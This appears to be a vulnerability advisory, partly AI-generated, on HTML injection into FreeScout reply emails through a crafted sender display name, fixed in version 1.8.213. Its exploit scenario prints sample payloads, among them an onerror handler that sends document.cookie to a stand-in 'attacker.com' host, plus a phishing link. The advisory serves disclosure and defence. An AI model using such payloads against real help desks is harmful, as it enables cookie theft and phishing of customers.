| Exploitation Conditions | The attack requires: (1) the target FreeScout instance to accept inbound emails from external sources (standard configuration for help desk software), (2) a support agent to open and reply to the crafted email (user interaction by support staff, not the attacker), and (3) the outgoing reply email to be rendered with HTML enabled in the recipient's email client (standard for most email clients). No special FreeScout configuration, feature enablement, or authentication is required from the attacker's perspective. The vulnerability exists in default configurations and affects any FreeScout instance with external email ingestion enabled. The limiting factor is user interaction: a support agent must initiate a reply for the injected HTML to be sent to the customer, so automated or silent exploitation is not possible. However, this is a low friction requirement in active help desk environments where agents regularly respond to inbound tickets. |
| Impact | CVSS score of 5.8 (Medium) with network access, low complexity, and no authentication required correctly reflects the ease of exploitation. The integrity impact (I:L) is appropriate for HTML injection enabling phishing and content spoofing. However, the scope change (S:C) may overstate impact in email context since the injected HTML affects email recipients, not the FreeScout application itself. EPSS or KEV status is not provided, preventing assessment of real-world exploitation prevalence. The attack requires user interaction from support agents (they must reply to the crafted email), which reduces raw severity. Real-world risk is moderate: an attacker can compromise email thread integrity and customer trust by injecting phishing links into seemingly legitimate support communications, but the attack does not execute code on the server or steal data directly. The lack of authentication requirement and straightforward exploit method (send email with crafted From name) make this a practical attack against any FreeScout instance receiving external emails. Organizations with strict email content filtering or those using email clients that disable HTML rendering mitigate this risk significantly. |
| Exploit ScenarioDerived | An attacker sends a phishing email to a FreeScout support inbox with a crafted From display name such as 'Customer <img src=x onerror="fetch(attacker.com/steal?cookie=" + document.cookie + ")">' or 'Support Team Member <a href="https://phishing-site.com">Verify Your Account</a>'. When a FreeScout support agent opens the ticket and replies with an auto-generated response that includes the customer's name in the signature, the injected HTML renders in the outgoing email. The recipient (actual customer) receives what appears to be a legitimate support reply from the organization but containing injected phishing links or malicious scripts, compromising trust and enabling credential theft or malware delivery. |

Alert meAnalysisAIv1 – Apr 21, 2026
HTML injection in FreeScout prior to version 1.8.213 allows unauthenticated attackers to inject arbitrary HTML into outgoing support emails by crafting a malicious From display name. The unsanitized name is stored in the database and rendered unescaped via the {%customer.fullName%} template variable in reply emails, enabling attackers to embed phishing links, tracking pixels, and spoofed content in emails sent from the organization's legitimate address. No public exploit code identified at time of analysis.
RemediationAI
Upgrade FreeScout to version 1.8.213 or later immediately. The patch implements HTML entity encoding or output escaping for the {%customer.fullName%} template variable and sanitizes the From display name upon storage. If immediate upgrade is not possible, apply input validation and sanitization at the email ingestion point to strip or escape HTML-like characters from sender display names before database storage, though this may alter legitimate sender names containing special characters and is not a complete mitigation. Alternatively, configure email client or server-side filters to strip HTML from inbound email metadata fields, though this is a host-based workaround requiring client-side enforcement. The primary and only recommended fix is the vendor-released patch in version 1.8.213. Technical ContextAI · show details
FreeScout is a self-hosted help desk application that processes inbound emails and generates templated outgoing replies. The vulnerability exists in the email template rendering pipeline: user-supplied email metadata (the From field's display name) is stored directly in the database without HTML entity encoding or sanitization. When FreeScout generates outgoing reply emails using Jinja2 or similar template syntax, it renders the customer's full name via the {%customer.fullName%} variable into the email body without output escaping. This is a Improper Output Neutralization for Web (CWE-116 / Cross-site Scripting equivalent in email context) issue. The attack vector is network-based: any attacker can send an email to the FreeScout instance with a crafted From display name containing HTML markup (e.g., "<img src=x onerror='alert(1)'> Attacker Name"), and when a support agent replies, that HTML is injected into the outgoing email sent to the customer, executed by the recipient's email client.

FreeScout is a free self-hosted help desk and shared mailbox. Prior to version 1.8.213, an unauthenticated attacker can inject arbitrary HTML into outgoing emails generated by FreeScout by sending an email with a crafted From display name. The name is stored in the database without sanitization and rendered unescaped into outgoing reply emails via the {%customer.fullName%} signature variable. This allows embedding phishing links, tracking pixels, and spoofed content inside legitimate support emails sent from the organization's address. Version 1.8.213 fixes the issue.
